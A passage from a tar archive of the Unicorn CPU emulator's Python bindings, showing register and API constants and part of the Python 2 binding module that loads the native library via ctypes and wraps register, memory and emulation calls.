UC_TRICORE_REG_DPR2_U = 52 UC_TRICORE_REG_DPR3_U = 53 UC_TRICORE_REG_DPR0_L = 54 UC_TRICORE_REG_DPR1_L = 55 UC_TRICORE_REG_DPR2_L = 56 UC_TRICORE_REG_DPR3_L = 57 UC_TRICORE_REG_CPR0_U = 58 UC_TRICORE_REG_CPR1_U = 59 UC_TRICORE_REG_CPR2_U = 60 UC_TRICORE_REG_CPR3_U = 61 UC_TRICORE_REG_CPR0_L = 62 UC_TRICORE_REG_CPR1_L = 63 UC_TRICORE_REG_CPR2_L = 64 UC_TRICORE_REG_CPR3_L = 65 UC_TRICORE_REG_DPM0 = 66 UC_TRICORE_REG_DPM1 = 67 UC_TRICORE_REG_DPM2 = 68 UC_TRICORE_REG_DPM3 = 69 UC_TRICORE_REG_CPM0 = 70 UC_TRICORE_REG_CPM1 = 71 UC_TRICORE_REG_CPM2 = 72 UC_TRICORE_REG_CPM3 = 73 UC_TRICORE_REG_MMU_CON = 74 UC_TRICORE_REG_MMU_ASI = 75 UC_TRICORE_REG_MMU_TVA = 76 UC_TRICORE_REG_MMU_TPA = 77 UC_TRICORE_REG_MMU_TPX = 78 UC_TRICORE_REG_MMU_TFA = 79 UC_TRICORE_REG_BMACON = 80 UC_TRICORE_REG_SMACON = 81 UC_TRICORE_REG_DIEAR = 82 UC_TRICORE_REG_DIETR = 83 UC_TRICORE_REG_CCDIER = 84 UC_TRICORE_REG_MIECON = 85 UC_TRICORE_REG_PIEAR = 86 UC_TRICORE_REG_PIETR = 87 UC_TRICORE_REG_CCPIER = 88 UC_TRICORE_REG_DBGSR = 89 UC_TRICORE_REG_EXEVT = 90 UC_TRICORE_REG_CREVT = 91 UC_TRICORE_REG_SWEVT = 92 UC_TRICORE_REG_TR0EVT = 93 UC_TRICORE_REG_TR1EVT = 94 UC_TRICORE_REG_DMS = 95 UC_TRICORE_REG_DCX = 96 UC_TRICORE_REG_DBGTCR = 97 UC_TRICORE_REG_CCTRL = 98 UC_TRICORE_REG_CCNT = 99 UC_TRICORE_REG_ICNT = 100 UC_TRICORE_REG_M1CNT = 101 UC_TRICORE_REG_M2CNT = 102 UC_TRICORE_REG_M3CNT = 103 UC_TRICORE_REG_ENDING = 104 UC_TRICORE_REG_GA0 = 1 UC_TRICORE_REG_GA1 = 2 UC_TRICORE_REG_GA8 = 9 UC_TRICORE_REG_GA9 = 10 UC_TRICORE_REG_SP = 11 UC_TRICORE_REG_LR = 12 UC_TRICORE_REG_IA = 16 UC_TRICORE_REG_ID = 32 �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn.py����������������������������������������������������0000664�0000000�0000000�00000000463�14675241067�0022031�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������import sys as _sys from .unicorn_const import ( UC_VERSION_MAJOR as __MAJOR, UC_VERSION_MINOR as __MINOR, UC_VERSION_PATCH as __PATCH ) __version__ = "%u.%u.%u" % (__MAJOR, __MINOR, __PATCH) if _sys.version_info.major == 2: from .unicorn_py2 import * else: from .unicorn_py3 import * �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_const.py����������������������������������������������0000664�0000000�0000000�00000006047�14675241067�0023243�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.py] UC_API_MAJOR = 2 UC_API_MINOR = 1 UC_API_PATCH = 0 UC_API_EXTRA = 255 UC_VERSION_MAJOR = 2 UC_VERSION_MINOR = 1 UC_VERSION_PATCH = 0 UC_VERSION_EXTRA = 255 UC_SECOND_SCALE = 1000000 UC_MILISECOND_SCALE = 1000 UC_ARCH_ARM = 1 UC_ARCH_ARM64 = 2 UC_ARCH_MIPS = 3 UC_ARCH_X86 = 4 UC_ARCH_PPC = 5 UC_ARCH_SPARC = 6 UC_ARCH_M68K = 7 UC_ARCH_RISCV = 8 UC_ARCH_S390X = 9 UC_ARCH_TRICORE = 10 UC_ARCH_MAX = 11 UC_MODE_LITTLE_ENDIAN = 0 UC_MODE_BIG_ENDIAN = 1073741824 UC_MODE_ARM = 0 UC_MODE_THUMB = 16 UC_MODE_MCLASS = 32 UC_MODE_V8 = 64 UC_MODE_ARMBE8 = 1024 UC_MODE_ARM926 = 128 UC_MODE_ARM946 = 256 UC_MODE_ARM1176 = 512 UC_MODE_MICRO = 16 UC_MODE_MIPS3 = 32 UC_MODE_MIPS32R6 = 64 UC_MODE_MIPS32 = 4 UC_MODE_MIPS64 = 8 UC_MODE_16 = 2 UC_MODE_32 = 4 UC_MODE_64 = 8 UC_MODE_PPC32 = 4 UC_MODE_PPC64 = 8 UC_MODE_QPX = 16 UC_MODE_SPARC32 = 4 UC_MODE_SPARC64 = 8 UC_MODE_V9 = 16 UC_MODE_RISCV32 = 4 UC_MODE_RISCV64 = 8 UC_ERR_OK = 0 UC_ERR_NOMEM = 1 UC_ERR_ARCH = 2 UC_ERR_HANDLE = 3 UC_ERR_MODE = 4 UC_ERR_VERSION = 5 UC_ERR_READ_UNMAPPED = 6 UC_ERR_WRITE_UNMAPPED = 7 UC_ERR_FETCH_UNMAPPED = 8 UC_ERR_HOOK = 9 UC_ERR_INSN_INVALID = 10 UC_ERR_MAP = 11 UC_ERR_WRITE_PROT = 12 UC_ERR_READ_PROT = 13 UC_ERR_FETCH_PROT = 14 UC_ERR_ARG = 15 UC_ERR_READ_UNALIGNED = 16 UC_ERR_WRITE_UNALIGNED = 17 UC_ERR_FETCH_UNALIGNED = 18 UC_ERR_HOOK_EXIST = 19 UC_ERR_RESOURCE = 20 UC_ERR_EXCEPTION = 21 UC_ERR_OVERFLOW = 22 UC_MEM_READ = 16 UC_MEM_WRITE = 17 UC_MEM_FETCH = 18 UC_MEM_READ_UNMAPPED = 19 UC_MEM_WRITE_UNMAPPED = 20 UC_MEM_FETCH_UNMAPPED = 21 UC_MEM_WRITE_PROT = 22 UC_MEM_READ_PROT = 23 UC_MEM_FETCH_PROT = 24 UC_MEM_READ_AFTER = 25 UC_TCG_OP_SUB = 0 UC_TCG_OP_FLAG_CMP = 1 UC_TCG_OP_FLAG_DIRECT = 2 UC_HOOK_INTR = 1 UC_HOOK_INSN = 2 UC_HOOK_CODE = 4 UC_HOOK_BLOCK = 8 UC_HOOK_MEM_READ_UNMAPPED = 16 UC_HOOK_MEM_WRITE_UNMAPPED = 32 UC_HOOK_MEM_FETCH_UNMAPPED = 64 UC_HOOK_MEM_READ_PROT = 128 UC_HOOK_MEM_WRITE_PROT = 256 UC_HOOK_MEM_FETCH_PROT = 512 UC_HOOK_MEM_READ = 1024 UC_HOOK_MEM_WRITE = 2048 UC_HOOK_MEM_FETCH = 4096 UC_HOOK_MEM_READ_AFTER = 8192 UC_HOOK_INSN_INVALID = 16384 UC_HOOK_EDGE_GENERATED = 32768 UC_HOOK_TCG_OPCODE = 65536 UC_HOOK_TLB_FILL = 131072 UC_HOOK_MEM_UNMAPPED = 112 UC_HOOK_MEM_PROT = 896 UC_HOOK_MEM_READ_INVALID = 144 UC_HOOK_MEM_WRITE_INVALID = 288 UC_HOOK_MEM_FETCH_INVALID = 576 UC_HOOK_MEM_INVALID = 1008 UC_HOOK_MEM_VALID = 7168 UC_QUERY_MODE = 1 UC_QUERY_PAGE_SIZE = 2 UC_QUERY_ARCH = 3 UC_QUERY_TIMEOUT = 4 UC_CTL_IO_NONE = 0 UC_CTL_IO_WRITE = 1 UC_CTL_IO_READ = 2 UC_CTL_IO_READ_WRITE = 3 UC_TLB_CPU = 0 UC_TLB_VIRTUAL = 1 UC_CTL_UC_MODE = 0 UC_CTL_UC_PAGE_SIZE = 1 UC_CTL_UC_ARCH = 2 UC_CTL_UC_TIMEOUT = 3 UC_CTL_UC_USE_EXITS = 4 UC_CTL_UC_EXITS_CNT = 5 UC_CTL_UC_EXITS = 6 UC_CTL_CPU_MODEL = 7 UC_CTL_TB_REQUEST_CACHE = 8 UC_CTL_TB_REMOVE_CACHE = 9 UC_CTL_TB_FLUSH = 10 UC_CTL_TLB_FLUSH = 11 UC_CTL_TLB_TYPE = 12 UC_CTL_TCG_BUFFER_SIZE = 13 UC_CTL_CONTEXT_MODE = 14 UC_PROT_NONE = 0 UC_PROT_READ = 1 UC_PROT_WRITE = 2 UC_PROT_EXEC = 4 UC_PROT_ALL = 7 UC_CTL_CONTEXT_CPU = 1 UC_CTL_CONTEXT_MEMORY = 2 �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/unicorn_py2.py������������������������������������������������0000664�0000000�0000000�00000113062�14675241067�0022623�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Unicorn Python bindings, by Nguyen Anh Quynnh <aquynh@gmail.com> import ctypes import ctypes.util import distutils.sysconfig from functools import wraps import pkg_resources import inspect import os.path import sys import weakref import functools from collections import namedtuple # We can't place this file in a separate folder due to Python2 limitations but # anyway we just maintain it with minimum efforts and it has been more than 3 # years since EOL of Python2 so it should be fine. from . import x86_const, arm_const, arm64_const, unicorn_const as uc # Compatibility placeholder, nothing special here ucsubclass = 0 if not hasattr(sys.modules[__name__], "__file__"): __file__ = inspect.getfile(inspect.currentframe()) _python2 = sys.version_info[0] < 3 if _python2: range = xrange _lib = { 'darwin': 'libunicorn.2.dylib', 'win32': 'unicorn.dll', 'cygwin': 'cygunicorn.dll', 'linux': 'libunicorn.so.2', 'linux2': 'libunicorn.so.2' } # Windows DLL in dependency order _all_windows_dlls = ( "libwinpthread-1.dll", "libgcc_s_seh-1.dll", "libgcc_s_dw2-1.dll", ) _loaded_windows_dlls = set() def _load_win_support(path): for dll in _all_windows_dlls: if dll in _loaded_windows_dlls: continue lib_file = os.path.join(path, dll) if ('/' not in path and '\\' not in path) or os.path.exists(lib_file): try: #print('Trying to load Windows library', lib_file) ctypes.cdll.LoadLibrary(lib_file) #print('SUCCESS') _loaded_windows_dlls.add(dll) except OSError as e: #print('FAIL to load %s' %lib_file, e) continue # Initial attempt: load all dlls globally if sys.platform in ('win32', 'cygwin'): _load_win_support('') def _load_lib(path): try: if sys.platform in ('win32', 'cygwin'): _load_win_support(path) lib_file = os.path.join(path, _lib.get(sys.platform, 'libunicorn.so.2')) dll = ctypes.cdll.LoadLibrary(lib_file) #print('SUCCESS') return dll except OSError as e: #print('FAIL to load %s' %lib_file, e) return None _uc = None # Loading attempts, in order # - user-provided environment variable # - pkg_resources can get us the path to the local libraries # - we can get the path to the local libraries by parsing our filename # - global load # - python's lib directory # - last-gasp attempt at some hardcoded paths on darwin and linux _path_list = [os.getenv('LIBUNICORN_PATH', None), pkg_resources.resource_filename(__name__, 'lib'), os.path.join(os.path.split(__file__)[0], 'lib'), '', distutils.sysconfig.get_python_lib(), "/usr/local/lib/" if sys.platform == 'darwin' else '/usr/lib64', os.getenv('PATH', '')] # print(_path_list) #print("-" * 80) for _path in _path_list: if _path is None: continue _uc = _load_lib(_path) if _uc is not None: break else: raise ImportError("ERROR: fail to load the dynamic library.") # __version__ = "%u.%u.%u" % (uc.UC_VERSION_MAJOR, uc.UC_VERSION_MINOR, uc.UC_VERSION_EXTRA) # setup all the function prototype def _setup_prototype(lib, fname, restype, *argtypes): try: getattr(lib, fname).restype = restype getattr(lib, fname).argtypes = argtypes except AttributeError: raise ImportError("ERROR: Fail to setup some function prototypes. Make sure you have cleaned your unicorn1 installation.") ucerr = ctypes.c_int uc_mode = ctypes.c_int uc_arch = ctypes.c_int uc_engine = ctypes.c_void_p uc_context = ctypes.c_void_p uc_hook_h = ctypes.c_size_t class _uc_mem_region(ctypes.Structure): _fields_ = [ ("begin", ctypes.c_uint64), ("end", ctypes.c_uint64), ("perms", ctypes.c_uint32), ] class uc_tb(ctypes.Structure): """"TranslationBlock""" _fields_ = [ ("pc", ctypes.c_uint64), ("icount", ctypes.c_uint16), ("size", ctypes.c_uint16) ] _setup_prototype(_uc, "uc_version", ctypes.c_uint, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int)) _setup_prototype(_uc, "uc_arch_supported", ctypes.c_bool, ctypes.c_int) _setup_prototype(_uc, "uc_open", ucerr, ctypes.c_uint, ctypes.c_uint, ctypes.POINTER(uc_engine)) _setup_prototype(_uc, "uc_close", ucerr, uc_engine) _setup_prototype(_uc, "uc_strerror", ctypes.c_char_p, ucerr) _setup_prototype(_uc, "uc_errno", ucerr, uc_engine) _setup_prototype(_uc, "uc_reg_read", ucerr, uc_engine, ctypes.c_int, ctypes.c_void_p) _setup_prototype(_uc, "uc_reg_write", ucerr, uc_engine, ctypes.c_int, ctypes.c_void_p) _setup_prototype(_uc, "uc_mem_read", ucerr, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t) _setup_prototype(_uc, "uc_mem_write", ucerr, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t) _setup_prototype(_uc, "uc_emu_start", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_size_t) _setup_prototype(_uc, "uc_emu_stop", ucerr, uc_engine) _setup_prototype(_uc, "uc_hook_del", ucerr, uc_engine, uc_hook_h) _setup_prototype(_uc, "uc_mmio_map", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p) _setup_prototype(_uc, "uc_mem_map", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32) _setup_prototype(_uc, "uc_mem_map_ptr", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_void_p) _setup_prototype(_uc, "uc_mem_unmap", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t) _setup_prototype(_uc, "uc_mem_protect", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32) _setup_prototype(_uc, "uc_query", ucerr, uc_engine, ctypes.c_uint32, ctypes.POINTER(ctypes.c_size_t)) _setup_prototype(_uc, "uc_context_alloc", ucerr, uc_engine, ctypes.POINTER(uc_context)) _setup_prototype(_uc, "uc_free", ucerr, ctypes.c_void_p) _setup_prototype(_uc, "uc_context_save", ucerr, uc_engine, uc_context) _setup_prototype(_uc, "uc_context_restore", ucerr, uc_engine, uc_context) _setup_prototype(_uc, "uc_context_size", ctypes.c_size_t, uc_engine) _setup_prototype(_uc, "uc_context_reg_read", ucerr, uc_context, ctypes.c_int, ctypes.c_void_p) _setup_prototype(_uc, "uc_context_reg_write", ucerr, uc_context, ctypes.c_int, ctypes.c_void_p) _setup_prototype(_uc, "uc_context_free", ucerr, uc_context) _setup_prototype(_uc, "uc_mem_regions", ucerr, uc_engine, ctypes.POINTER(ctypes.POINTER(_uc_mem_region)), ctypes.POINTER(ctypes.c_uint32)) # https://bugs.python.org/issue42880 _setup_prototype(_uc, "uc_hook_add", ucerr, uc_engine, ctypes.POINTER(uc_hook_h), ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_uint64, ctypes.c_uint64) _setup_prototype(_uc, "uc_ctl", ucerr, uc_engine, ctypes.c_int) UC_HOOK_CODE_CB = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p) UC_HOOK_INSN_INVALID_CB = ctypes.CFUNCTYPE(ctypes.c_bool, uc_engine, ctypes.c_void_p) UC_HOOK_MEM_INVALID_CB = ctypes.CFUNCTYPE( ctypes.c_bool, uc_engine, ctypes.c_int, ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p ) UC_HOOK_MEM_ACCESS_CB = ctypes.CFUNCTYPE( None, uc_engine, ctypes.c_int, ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p ) UC_HOOK_INTR_CB = ctypes.CFUNCTYPE( None, uc_engine, ctypes.c_uint32, ctypes.c_void_p ) UC_HOOK_INSN_IN_CB = ctypes.CFUNCTYPE( ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_void_p ) UC_HOOK_INSN_OUT_CB = ctypes.CFUNCTYPE( None, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32, ctypes.c_void_p ) UC_HOOK_INSN_SYSCALL_CB = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_void_p) UC_HOOK_INSN_SYS_CB = ctypes.CFUNCTYPE(ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_void_p, ctypes.c_void_p) UC_MMIO_READ_CB = ctypes.CFUNCTYPE( ctypes.c_uint64, uc_engine, ctypes.c_uint64, ctypes.c_int, ctypes.c_void_p ) UC_MMIO_WRITE_CB = ctypes.CFUNCTYPE( None, uc_engine, ctypes.c_uint64, ctypes.c_int, ctypes.c_uint64, ctypes.c_void_p ) UC_HOOK_EDGE_GEN_CB = ctypes.CFUNCTYPE( None, uc_engine, ctypes.POINTER(uc_tb), ctypes.POINTER(uc_tb), ctypes.c_void_p ) UC_HOOK_TCG_OPCODE_CB = ctypes.CFUNCTYPE( None, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p ) # access to error code via @errno of UcError class UcError(Exception): def __init__(self, errno): self.errno = errno def __str__(self): return _uc.uc_strerror(self.errno).decode('ascii') # return the core's version def uc_version(): major = ctypes.c_int() minor = ctypes.c_int() combined = _uc.uc_version(ctypes.byref(major), ctypes.byref(minor)) return (major.value, minor.value, combined) # return the binding's version def version_bind(): return ( uc.UC_API_MAJOR, uc.UC_API_MINOR, (uc.UC_API_MAJOR << 8) + uc.UC_API_MINOR, ) # check to see if this engine supports a particular arch def uc_arch_supported(query): return _uc.uc_arch_supported(query) # uc_reg_read/write and uc_context_reg_read/write. def reg_read(reg_read_func, arch, reg_id, opt=None): if arch == uc.UC_ARCH_X86: if reg_id in [x86_const.UC_X86_REG_IDTR, x86_const.UC_X86_REG_GDTR, x86_const.UC_X86_REG_LDTR, x86_const.UC_X86_REG_TR]: reg = uc_x86_mmr() status = reg_read_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return reg.selector, reg.base, reg.limit, reg.flags if reg_id in range(x86_const.UC_X86_REG_FP0, x86_const.UC_X86_REG_FP0+8): reg = uc_x86_float80() status = reg_read_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return reg.mantissa, reg.exponent if reg_id in range(x86_const.UC_X86_REG_XMM0, x86_const.UC_X86_REG_XMM0+8): reg = uc_x86_xmm() status = reg_read_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return reg.low_qword | (reg.high_qword << 64) if reg_id in range(x86_const.UC_X86_REG_YMM0, x86_const.UC_X86_REG_YMM0+16): reg = uc_x86_ymm() status = reg_read_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return reg.first_qword | (reg.second_qword << 64) | (reg.third_qword << 128) | (reg.fourth_qword << 192) if reg_id is x86_const.UC_X86_REG_MSR: if opt is None: raise UcError(uc.UC_ERR_ARG) reg = uc_x86_msr() reg.rid = opt status = reg_read_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return reg.value if arch == uc.UC_ARCH_ARM: if reg_id == arm_const.UC_ARM_REG_CP_REG: reg = uc_arm_cp_reg() if not isinstance(opt, tuple) or len(opt) != 7: raise UcError(uc.UC_ERR_ARG) reg.cp, reg.is64, reg.sec, reg.crn, reg.crm, reg.opc1, reg.opc2 = opt status = reg_read_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return reg.val if arch == uc.UC_ARCH_ARM64: if reg_id == arm64_const.UC_ARM64_REG_CP_REG: reg = uc_arm64_cp_reg() if not isinstance(opt, tuple) or len(opt) != 5: raise UcError(uc.UC_ERR_ARG) reg.crn, reg.crm, reg.op0, reg.op1, reg.op2 = opt status = reg_read_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return reg.val elif reg_id in range(arm64_const.UC_ARM64_REG_Q0, arm64_const.UC_ARM64_REG_Q31+1) or range(arm64_const.UC_ARM64_REG_V0, arm64_const.UC_ARM64_REG_V31+1): reg = uc_arm64_neon128() status = reg_read_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return reg.low_qword | (reg.high_qword << 64) # read to 64bit number to be safe reg = ctypes.c_uint64(0) status = reg_read_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return reg.value def reg_write(reg_write_func, arch, reg_id, value): reg = None if arch == uc.UC_ARCH_X86: if reg_id in [x86_const.UC_X86_REG_IDTR, x86_const.UC_X86_REG_GDTR, x86_const.UC_X86_REG_LDTR, x86_const.UC_X86_REG_TR]: assert isinstance(value, tuple) and len(value) == 4 reg = uc_x86_mmr() reg.selector = value[0] reg.base = value[1] reg.limit = value[2] reg.flags = value[3] if reg_id in range(x86_const.UC_X86_REG_FP0, x86_const.UC_X86_REG_FP0+8): reg = uc_x86_float80() reg.mantissa = value[0] reg.exponent = value[1] if reg_id in range(x86_const.UC_X86_REG_XMM0, x86_const.UC_X86_REG_XMM0+8): reg = uc_x86_xmm() reg.low_qword = value & 0xffffffffffffffff reg.high_qword = value >> 64 if reg_id in range(x86_const.UC_X86_REG_YMM0, x86_const.UC_X86_REG_YMM0+16): reg = uc_x86_ymm() reg.first_qword = value & 0xffffffffffffffff reg.second_qword = (value >> 64) & 0xffffffffffffffff reg.third_qword = (value >> 128) & 0xffffffffffffffff reg.fourth_qword = value >> 192 if reg_id is x86_const.UC_X86_REG_MSR: reg = uc_x86_msr() reg.rid = value[0] reg.value = value[1] if arch == uc.UC_ARCH_ARM64: if reg_id in range(arm64_const.UC_ARM64_REG_Q0, arm64_const.UC_ARM64_REG_Q31+1) or range(arm64_const.UC_ARM64_REG_V0, arm64_const.UC_ARM64_REG_V31+1): reg = uc_arm64_neon128() reg.low_qword = value & 0xffffffffffffffff reg.high_qword = value >> 64 if arch == uc.UC_ARCH_ARM: if reg_id == arm64_const.UC_ARM64_REG_CP_REG: reg = uc_arm64_cp_reg() if not isinstance(value, tuple) or len(value) != 6: raise UcError(uc.UC_ERR_ARG) reg.crn, reg.crm, reg.op0, reg.op1, reg.op2, reg.val = value elif reg_id == arm_const.UC_ARM_REG_CP_REG: reg = uc_arm_cp_reg() if not isinstance(value, tuple) or len(value) != 8: raise UcError(uc.UC_ERR_ARG) reg.cp, reg.is64, reg.sec, reg.crn, reg.crm, reg.opc1, reg.opc2, reg.val = value if reg is None: # convert to 64bit number to be safe reg = ctypes.c_uint64(value) status = reg_write_func(reg_id, ctypes.byref(reg)) if status != uc.UC_ERR_OK: raise UcError(status) return def _catch_hook_exception(func): @wraps(func) def wrapper(self, *args, **kwargs): """Catches exceptions raised in hook functions. If an exception is raised, it is saved to the Uc object and a call to stop emulation is issued. """ try: return func(self, *args, **kwargs) except Exception as e: # If multiple hooks raise exceptions, just use the first one if self._hook_exception is None: self._hook_exception = e self.emu_stop() return wrapper class uc_arm_cp_reg(ctypes.Structure): """ARM coprocessors registers for instructions MRC, MCR, MRRC, MCRR""" _fields_ = [ ("cp", ctypes.c_uint32), ("is64", ctypes.c_uint32), ("sec", ctypes.c_uint32), ("crn", ctypes.c_uint32), ("crm", ctypes.c_uint32), ("opc1", ctypes.c_uint32), ("opc2", ctypes.c_uint32), ("val", ctypes.c_uint64) ] class uc_arm64_cp_reg(ctypes.Structure): """ARM64 coprocessors registers for instructions MRS, MSR""" _fields_ = [ ("crn", ctypes.c_uint32), ("crm", ctypes.c_uint32), ("op0", ctypes.c_uint32), ("op1", ctypes.c_uint32), ("op2", ctypes.c_uint32), ("val", ctypes.c_uint64) ] class uc_x86_mmr(ctypes.Structure): """Memory-Management Register for instructions IDTR, GDTR, LDTR, TR.""" _fields_ = [ ("selector", ctypes.c_uint16), # not used by GDTR and IDTR ("base", ctypes.c_uint64), # handle 32 or 64 bit CPUs ("limit", ctypes.c_uint32), ("flags", ctypes.c_uint32), # not used by GDTR and IDTR ] class uc_x86_msr(ctypes.Structure): _fields_ = [ ("rid", ctypes.c_uint32), ("value", ctypes.c_uint64), ] class uc_x86_float80(ctypes.Structure): """Float80""" _fields_ = [ ("mantissa", ctypes.c_uint64), ("exponent", ctypes.c_uint16), ] class uc_x86_xmm(ctypes.Structure): """128-bit xmm register""" _fields_ = [ ("low_qword", ctypes.c_uint64), ("high_qword", ctypes.c_uint64), ] class uc_x86_ymm(ctypes.Structure): """256-bit ymm register""" _fields_ = [ ("first_qword", ctypes.c_uint64), ("second_qword", ctypes.c_uint64), ("third_qword", ctypes.c_uint64), ("fourth_qword", ctypes.c_uint64), ] class uc_arm64_neon128(ctypes.Structure): """128-bit neon register""" _fields_ = [ ("low_qword", ctypes.c_uint64), ("high_qword", ctypes.c_uint64), ] # Subclassing ref to allow property assignment. class UcRef(weakref.ref): pass # This class tracks Uc instance destruction and releases handles. class UcCleanupManager(object): def __init__(self): self._refs = {} def register(self, uc): ref = UcRef(uc, self._finalizer) ref._uch = uc._uch ref._class = uc.__class__ self._refs[id(ref)] = ref def _finalizer(self, ref): # note: this method must be completely self-contained and cannot have any references # to anything else in this module. # # This is because it may be called late in the Python interpreter's shutdown phase, at # which point the module's variables may already have been deinitialized and set to None. # # Not respecting that can lead to errors such as: # Exception AttributeError: # "'NoneType' object has no attribute 'release_handle'" # in <bound method UcCleanupManager._finalizer of # <unicorn.unicorn.UcCleanupManager object at 0x7f0bb83e4310>> ignored # # For that reason, we do not try to access the `Uc` class directly here but instead use # the saved `._class` reference. del self._refs[id(ref)] ref._class.release_handle(ref._uch) class Uc(object): _cleanup = UcCleanupManager() def __init__(self, arch, mode): # verify version compatibility with the core before doing anything (major, minor, _combined) = uc_version() # print("core version =", uc_version()) # print("binding version =", uc.UC_API_MAJOR, uc.UC_API_MINOR) if major != uc.UC_API_MAJOR or minor != uc.UC_API_MINOR: self._uch = None # our binding version is different from the core's API version raise UcError(uc.UC_ERR_VERSION) self._arch, self._mode = arch, mode self._uch = ctypes.c_void_p() status = _uc.uc_open(arch, mode, ctypes.byref(self._uch)) if status != uc.UC_ERR_OK: self._uch = None raise UcError(status) # internal mapping table to save callback & userdata self._callbacks = {} self._ctype_cbs = [] self._callback_count = 0 self._cleanup.register(self) self._hook_exception = None # The exception raised in a hook @staticmethod def release_handle(uch): if uch: try: status = _uc.uc_close(uch) if status != uc.UC_ERR_OK: raise UcError(status) except: # _uc might be pulled from under our feet pass # emulate from @begin, and stop when reaching address @until def emu_start(self, begin, until, timeout=0, count=0): self._hook_exception = None status = _uc.uc_emu_start(self._uch, begin, until, timeout, count) if status != uc.UC_ERR_OK: raise UcError(status) if self._hook_exception is not None: raise self._hook_exception # stop emulation def emu_stop(self): status = _uc.uc_emu_stop(self._uch) if status != uc.UC_ERR_OK: raise UcError(status) # return the value of a register def reg_read(self, reg_id, opt=None): return reg_read(functools.partial(_uc.uc_reg_read, self._uch), self._arch, reg_id, opt) # write to a register def reg_write(self, reg_id, value): return reg_write(functools.partial(_uc.uc_reg_write, self._uch), self._arch, reg_id, value) # read from MSR - X86 only def msr_read(self, msr_id): return self.reg_read(x86_const.UC_X86_REG_MSR, msr_id) # write to MSR - X86 only def msr_write(self, msr_id, value): return self.reg_write(x86_const.UC_X86_REG_MSR, (msr_id, value)) # read data from memory def mem_read(self, address, size): data = ctypes.create_string_buffer(size) status = _uc.uc_mem_read(self._uch, address, data, size) if status != uc.UC_ERR_OK: raise UcError(status) return bytearray(data) # write to memory def mem_write(self, address, data): status = _uc.uc_mem_write(self._uch, address, data, len(data)) if status != uc.UC_ERR_OK: raise UcError(status) def _mmio_map_read_cb(self, handle, offset, size, user_data): (cb, data) = self._callbacks[user_data] return cb(self, offset, size, data) def _mmio_map_write_cb(self, handle, offset, size, value, user_data): (cb, data) = self._callbacks[user_data] cb(self, offset, size, value, data) def mmio_map(self, address, size, read_cb, user_data_read, write_cb, user_data_write): internal_read_cb = ctypes.cast(UC_MMIO_READ_CB(self._mmio_map_read_cb), UC_MMIO_READ_CB) internal_write_cb = ctypes.cast(UC_MMIO_WRITE_CB(self._mmio_map_write_cb), UC_MMIO_WRITE_CB) self._callback_count += 1 self._callbacks[self._callback_count] = (read_cb, user_data_read) read_count = self._callback_count self._callback_count += 1 self._callbacks[self._callback_count] = (write_cb, user_data_write) write_count = self._callback_count status = _uc.uc_mmio_map(self._uch, address, size, internal_read_cb, read_count, internal_write_cb, write_count) if status != uc.UC_ERR_OK: raise UcError(status) # https://docs.python.org/3/library/ctypes.html#callback-functions self._ctype_cbs.append(internal_read_cb) self._ctype_cbs.append(internal_write_cb) # map a range of memory def mem_map(self, address, size, perms=uc.UC_PROT_ALL): status = _uc.uc_mem_map(self._uch, address, size, perms) if status != uc.UC_ERR_OK: raise UcError(status) # map a range of memory from a raw host memory address def mem_map_ptr(self, address, size, perms, ptr): status = _uc.uc_mem_map_ptr(self._uch, address, size, perms, ptr) if status != uc.UC_ERR_OK: raise UcError(status) # unmap a range of memory def mem_unmap(self, address, size): 